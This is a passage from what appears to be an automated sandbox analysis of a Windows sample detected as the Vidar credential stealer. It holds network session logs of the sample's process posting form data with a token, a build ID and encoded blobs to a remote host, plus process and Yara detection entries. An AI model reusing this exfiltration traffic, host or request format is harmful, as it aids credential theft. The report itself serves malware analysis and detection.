                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 86161
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------IECBGIDAEHCGDGCBKEBGCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC16355OUTData Raw: 50 72 51 4d 54 48 38 36 55 45 65 31 48 61 6a 47 61 41 45 50 34 2f 57 6a 72 53 2f 68 53 55 44 45 48 57 6a 6f 50 35 30 75 63 6d 6a 72 51 41 6e 58 31 6f 37 30 64 61 4d 35 6f 41 4f 74 48 51 30 64 61 54 39 4b 41 46 2f 4c 38 4b 4f 74 42 34 49 70 50 38 6d 67 5a 33 68 71 43 54 6f 61 6e 4e 56 35 33 43 52 73 37 48 43 71 4d 6b 31 6e 4a 32 56 32 66 4d 77 54 62 73 6a 32 58 77 42 2f 79 4a 4f 6e 2f 39 74 66 38 41 30 61 39 64 4c 58 4b 2f 44 65 59 58 48 67 48 54 4a 51 4d 42 76 4e 49 48 2f 62 56 36 36 71 76 69 4b 73 6c 4b 70 4b 55 64 6d 7a 39 49 6f 30 35 55 36 63 59 54 56 6d 6b 6b 2f 6b 46 46 46 46 5a 6d 67 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 46 46
                                                                                                                                                                                                                                                            Data Ascii: PrQMTH86UEe1HajGaAEP4/WjrS/hSUDEHWjoP50ucmjrQAnX1o70daM5oAOtHQ0daT9KAF/L8KOtB4IpP8mgZ3hqCToanNV53CRs7HCqMk1nJ2V2fMwTbsj2XwB/yJOn/9tf8A0a9dLXK/DeYXHgHTJQMBvNIH/bV66qviKslKpKUdmz9Io05U6cYTVmkk/kFFFFZmgUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC16355OUTData Raw: 36 52 2f 2b 6a 45 72 78 43 45 5a 55 56 39 56 6b 48 38 4b 58 72 2b 69 50 6e 38 34 2f 69 52 39 42 2b 33 6a 69 6b 78 78 2f 68 55 75 4d 2f 6e 53 45 56 39 47 65 4b 6d 51 46 65 4b 51 72 67 56 4b 56 70 70 57 6e 59 70 53 49 38 55 6d 50 78 70 35 46 49 51 61 4c 46 58 47 67 59 70 4d 55 2f 48 34 65 39 42 58 33 6f 73 4f 34 33 46 4a 6a 38 36 64 6a 46 42 47 4b 64 67 75 52 34 48 46 49 52 6a 33 71 54 48 54 74 54 53 50 70 53 73 55 4d 4e 4a 32 36 30 37 47 61 51 6a 38 71 56 68 6a 53 4d 55 30 2f 77 43 52 54 7a 7a 54 65 66 79 71 52 6a 61 4b 57 6b 78 2f 2b 75 70 4b 45 39 4b 61 61 64 32 70 4f 74 49 59 6e 61 6b 6f 50 70 6e 46 48 47 4b 54 52 51 68 36 38 55 6e 61 6c 36 30 67 4e 53 4d 4d 65 6c 4e 7a 54 73 55 33 39 66 57 6b 4d 37 77 31 74 2b 45 46 56 74 65 32 75 6f 5a 54 43 2b 51 77
                                                                                                                                                                                                                                                            Data Ascii: 6R/+jErxCEZUV9VkH8KXr+iPn84/iR9B+3jikxx/hUuM/nSEV9GeKmQFeKQrgVKVppWnYpSI8UmPxp5FIQaLFXGgYpMU/H4e9BX3osO43FJj86djFBGKdguR4HFIRj3qTHTtTSPpSsUMNJ2607GaQj8qVhjSMU0/wCRTzzTefyqRjaKWkx/+upKE9Kaad2pOtIYnakoPpnFHGKTRQh68Unal60gNSMMelNzTsU39fWkM7w1t+EFVte2uoZTC+Qw
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC16355OUTData Raw: 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 78 64 61 2f 34 2f 37 48 2f 64 6b 2f 6d 6c 62 56 59 75 74 66 38 41 48 2f 59 2f 37 73 6e 38 30 6f 41 79 76 47 76 2f 41 43 49 75 6f 66 38 41 62 50 38 41 39 47 4c 58 6c 4e 76 39 30 56 36 74 34 31 2f 35 45 58 55 50 2b 32 66 2f 41 4b 4d 57 76 4b 62 63 66 4b 4b 2b 68 79 62 2b 48 4c 31 50 6e 73 35 2f 69 52 39 43 79 50 35 55 74 48 34 30 44 6d 76 63 50 44 43 6a 50 4f 61 57 6b 6f 41 4d 55 43 6c 78 52 51 41 43 72 75 6c 38 33 5a 2f 36 35 76 38 41 2b 67 6d 71 66 39 4b 75 61 59 43
                                                                                                                                                                                                                                                            Data Ascii: AKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKxda/4/7H/dk/mlbVYutf8AH/Y/7sn80oAyvGv/ACIuof8AbP8A9GLXlNv90V6t41/5EXUP+2f/AKMWvKbcfKK+hyb+HL1Pns5/iR9CyP5UtH40DmvcPDCjPOaWkoAMUClxRQACrul83Z/65v8A+gmqf9KuaYC
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC16355OUTData Raw: 2f 37 48 2f 64 6b 2f 6d 6c 41 47 46 38 51 2f 38 41 6b 6e 47 71 2f 77 43 37 48 2f 36 4e 53 76 41 6f 2b 6c 65 2b 2f 45 50 2f 41 4a 4a 78 71 76 38 41 75 78 2f 2b 6a 55 72 77 47 4c 6f 4b 2b 68 79 62 2b 48 4c 31 50 45 7a 54 34 31 36 45 77 6f 36 55 43 69 76 63 50 4a 51 68 6f 50 53 67 6d 6b 6f 47 4a 51 66 70 52 52 51 4d 53 6c 35 6f 37 30 6c 41 77 4e 49 61 4d 38 30 5a 35 6f 47 4a 2b 74 46 47 65 4b 50 30 2b 74 41 77 36 55 6c 47 4d 38 55 6d 63 65 74 41 42 53 5a 70 61 51 48 33 6f 4b 44 4a 7a 31 70 44 6b 30 44 48 61 67 38 30 44 44 4f 66 72 53 64 2b 31 4c 2b 6c 4a 6d 67 41 50 54 69 6b 36 63 30 5a 79 50 38 41 47 6b 4e 41 78 61 54 4f 52 78 52 6b 39 50 30 6f 6f 41 51 2f 35 4e 46 48 62 70 2b 56 42 6f 47 65 69 48 70 55 45 6e 53 70 7a 30 71 43 54 70 57 4d 6a 35 4f 4f 35 36
                                                                                                                                                                                                                                                            Data Ascii: /7H/dk/mlAGF8Q/8AknGq/wC7H/6NSvAo+le+/EP/AJJxqv8Aux/+jUrwGLoK+hyb+HL1PEzT416Ewo6UCivcPJQhoPSgmkoGJQfpRRQMSl5o70lAwNIaM80Z5oGJ+tFGeKP0+tAw6UlGM8UmcetABSZpaQH3oKDJz1pDk0DHag80DDOfrSd+1L+lJmgAPTik6c0ZyP8AGkNAxaTORxRk9P0ooAQ/5NFHbp+VBoGeiHpUEnSpz0qCTpWMj5OO56
                                                                                                                                                                                                                                                            2024-04-29 20:13:37 UTC4386OUTData Raw: 6a 36 74 59 6c 6c 76 6d 46 37 63 74 6d 47 5a 76 49 63 67 78 66 75 31 78 30 4a 2b 38 31 65 4a 30 55 32 72 67 6d 65 7a 61 4f 2b 6a 54 36 4a 2f 77 41 4a 46 4a 39 6e 69 30 2b 2f 31 69 78 65 39 67 59 2f 4a 62 7a 71 5a 50 4d 42 42 2f 67 4a 4b 75 50 5a 73 64 71 35 58 58 39 41 76 4c 58 77 31 71 32 70 36 30 6d 71 57 2b 70 76 71 4b 44 7a 4a 35 68 39 6e 76 38 41 64 35 68 33 6f 4e 76 7a 62 52 30 59 4d 77 77 33 62 4e 63 48 52 53 73 4f 34 55 55 6c 4c 56 43 45 72 74 50 44 31 68 39 68 38 50 79 36 76 5a 33 4f 6d 79 36 70 63 70 4e 62 70 48 50 71 55 45 42 74 49 79 75 31 6e 4b 4f 36 73 7a 73 43 77 58 48 41 36 38 6b 6a 48 47 55 55 6d 42 36 52 62 78 2f 38 49 76 42 59 32 39 68 72 65 6d 32 31 75 5a 34 72 6d 38 31 61 4b 37 67 75 6e 38 7a 59 51 71 70 62 71 78 66 59 6d 39 67 63 71
                                                                                                                                                                                                                                                            Data Ascii: j6tYllvmF7ctmGZvIcgxfu1x0J+81eJ0U2rgmezaO+jT6J/wAJFJ9ni0+/1ixe9gY/JbzqZPMBB/gJKuPZsdq5XX9AvLXw1q2p60mqW+pvqKDzJ5h9nv8Ad5h3oNvzbR0YMww3bNcHRSsO4UUlLVCErtPD1h9h8Py6vZ3Omy6pcpNbpHPqUEBtIyu1nKO6szsCwXHA68kjHGUUmB6Rbx/8IvBY29hrem21uZ4rm81aK7gun8zYQqpbqxfYm9gcq
                                                                                                                                                                                                                                                            2024-04-29 20:13:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:38 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            31192.168.2.44977595.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:39 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJ
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:39 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------EHJJECBKKECFIEBGCAKJCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            32192.168.2.44977695.217.242.1424437440C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:41 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AFBAKKFCBFHIIEBGIDBG
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                            Host: 95.217.242.142
                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            2024-04-29 20:13:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 34 63 34 64 34 39 33 39 62 63 39 31 38 62 65 32 63 62 39 32 61 36 31 37 64 39 39 61 39 66 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 30 33 63 65 61 32 36 30 39 30 32 33 64 31 33 66 31 34 35 61 63 36 63 35 64 63 38 39 37 31 31 32 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                            Data Ascii: ------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="token"24c4d4939bc918be2cb92a617d99a9f0------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="build_id"03cea2609023d13f145ac6c5dc897112------AFBAKKFCBFHIIEBGIDBGCont
                                                                                                                                                                                                                                                            2024-04-29 20:13:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-04-29 20:13:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            33192.168.2.44977740.127.169.103443
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-04-29 20:13:56 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RauG9dSpKm2dhpW&MD=978uZbzx HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                            Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                            2024-04-29 20:13:56 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                            ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                                                                                                                            MS-CorrelationId: 67ff6b0d-7578-4e4c-93c7-ffd3a3fb0b5a
                                                                                                                                                                                                                                                            MS-RequestId: c5e9865b-5127-4a5e-b3de-bd74e1cec018
                                                                                                                                                                                                                                                            MS-CV: R3jVW9Pe/02rlwOC.0
                                                                                                                                                                                                                                                            X-Microsoft-SLSClientCache: 2160
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            Date: Mon, 29 Apr 2024 20:13:55 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 25457
                                                                                                                                                                                                                                                            2024-04-29 20:13:56 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                                                                                                                            Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                                                                                                                            2024-04-29 20:13:56 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                                                                                                                            Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:22:12:55
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                            Imagebase:0xa00000
                                                                                                                                                                                                                                                            File size:368'128 bytes
                                                                                                                                                                                                                                                            MD5 hash:B898CED2E152060F5770F1C6337006F6
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:22:12:55
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                            Imagebase:0x960000
                                                                                                                                                                                                                                                            File size:65'440 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:22:13:00
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:22:13:00
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://796299082092352771018332050787432950295397740/
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                            Start time:22:13:00
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                            Start time:22:13:00
                                                                                                                                                                                                                                                            Start date:29/04/2024
                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

